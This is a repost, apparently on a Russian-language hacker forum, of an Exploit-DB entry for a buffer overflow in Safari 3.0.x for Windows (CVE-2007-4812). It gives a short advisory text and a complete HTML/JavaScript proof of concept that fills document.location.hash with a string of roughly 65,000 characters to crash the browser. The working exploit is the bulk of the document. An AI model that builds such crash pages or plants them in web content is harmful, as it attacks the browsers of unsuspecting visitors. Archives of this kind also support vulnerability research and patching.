Exploit Apple Safari 3.0.x for Windows - 'Document.Location.Hash' Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30767
Проверка EDB
  1. Пройдено
Автор
AZIZOV E
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2007-4812
Дата публикации
2007-06-25
HTML:
source: https://www.securityfocus.com/bid/26448/info

Safari for Windows is prone to a buffer overflow that occurs when an attacker entices a victim to view a maliciously crafted webpage.

A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. 

<html> <body> <script> var maxbuf = 65474; buff = "A"; for (i=0;i<maxbuf;i++) { buff = buff+"A"; } document.location.hash = buff+"BOW! "; alert(document.location.hash); </script> </body> </html>
 
Источник
www.exploit-db.com

Похожие темы